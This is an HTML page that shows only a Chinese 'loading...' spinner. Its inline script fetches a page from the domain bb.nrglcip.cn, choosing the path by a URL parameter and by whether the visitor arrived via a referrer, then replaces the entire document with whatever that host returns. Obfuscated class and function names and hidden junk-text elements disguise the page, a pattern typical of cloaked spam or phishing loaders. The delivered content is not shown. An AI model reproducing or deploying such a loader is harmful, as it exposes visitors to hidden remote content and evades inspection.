<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QtaoExB6Y8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QtaoExB6Y8 .SCsE2V0RL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QtaoExB6Y8 .content {
            line-height: 50px;
            text-align: center
        }

        .QtaoExB6Y8 .img {
            width: 100%
        }

        .QtaoExB6Y8 .w2w3PhSjC2 {
            text-align: center
        }

        .QtaoExB6Y8 .w2w3PhSjC2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QtaoExB6Y8 .w2w3PhSjC2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QtaoExB6Y8 .w2w3PhSjC2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QtaoExB6Y8 .w2w3PhSjC2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QtaoExB6Y8 .w2w3PhSjC2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QtaoExB6Y8 .w2w3PhSjC2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QtaoExB6Y8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QWBvHAYMiF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var J4o3r = QWBvHAYMiF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ J4o3r +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ J4o3r +".html?a=share";
		}
		
        iKhWC8BP=url+"#"+new Date().getTime();
        iKhWC8BP && function() {
            $.get(iKhWC8BP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>CPxln0nrDnj412qZB2GpxP6pOl6bdp3hxg9ExMpUPTqrFcSiZ9OdTqtMqqZVuc78WV3s0VXvoGm1nCjF8bN6HYVd95bNb4aeoum4</p>
<ul style='display:none' >BELEDMeFH26o1HdnKvbcPvv0nSfU7wb9j4mQwp3sEE6tRJ</ul>
<div style='display:none'>bFa4bzEs8RnZH3oqLcE7OCNJJnW15hj</div>
<p  style='display:none'>CPxln0nrDnj412qZB2GpxP6pOl6bdp3hxg9ExMpUPTqrFcSiZ9OdTqtMqqZVuc78WV3s0VXvoGm1nCjF8bN6HYVd95bNb4aeoum4</p>
<h1 style='display:none' >TTxBjqfKkrrNGDdI6Fs6sfX9N6XKGO3LTxzTuPqV9149eSkf65z839gZLUkLWHAQShCWiyKZ5onteQLtrF4St8dKXYbSnKO18cVeV</h1>
<b style='display:none' >FXt4VSYV2fXtqRL9sGOHq5BmGeBoVlobVibtH7E</b><div class="QtaoExB6Y8">
    <div class="SCsE2V0RL">
        <div class="w2w3PhSjC2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >fUHeMbE36SoRzUniqeqUR2ZUqJlxNC2t28grcO1rliy83do9iRIRAUo6iAquxoPjSr79ANVyqrAzfSWiHSrrSd7WeWwpok7XPEzr3</b>
<a  href='#' style='display:none'>U0YXZ4rQNK319yveKOdvY1get2Tkbs0keARG0vR0TlFiE28kEBOLY5xyggwXTdHxBMapNuU7KNV7sbeag1Dn2j5IM15S2rqw</a>
<img  src='' style='display:none'>
<b style='display:none' >fUHeMbE36SoRzUniqeqUR2ZUqJlxNC2t28grcO1rliy83do9iRIRAUo6iAquxoPjSr79ANVyqrAzfSWiHSrrSd7WeWwpok7XPEzr3</b>
<img  src='' style='display:none'></body>
</html>